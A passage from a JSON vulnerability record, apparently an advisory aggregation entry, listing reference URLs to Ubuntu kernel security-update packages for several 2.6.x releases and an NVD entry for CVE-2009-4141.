        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4141"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
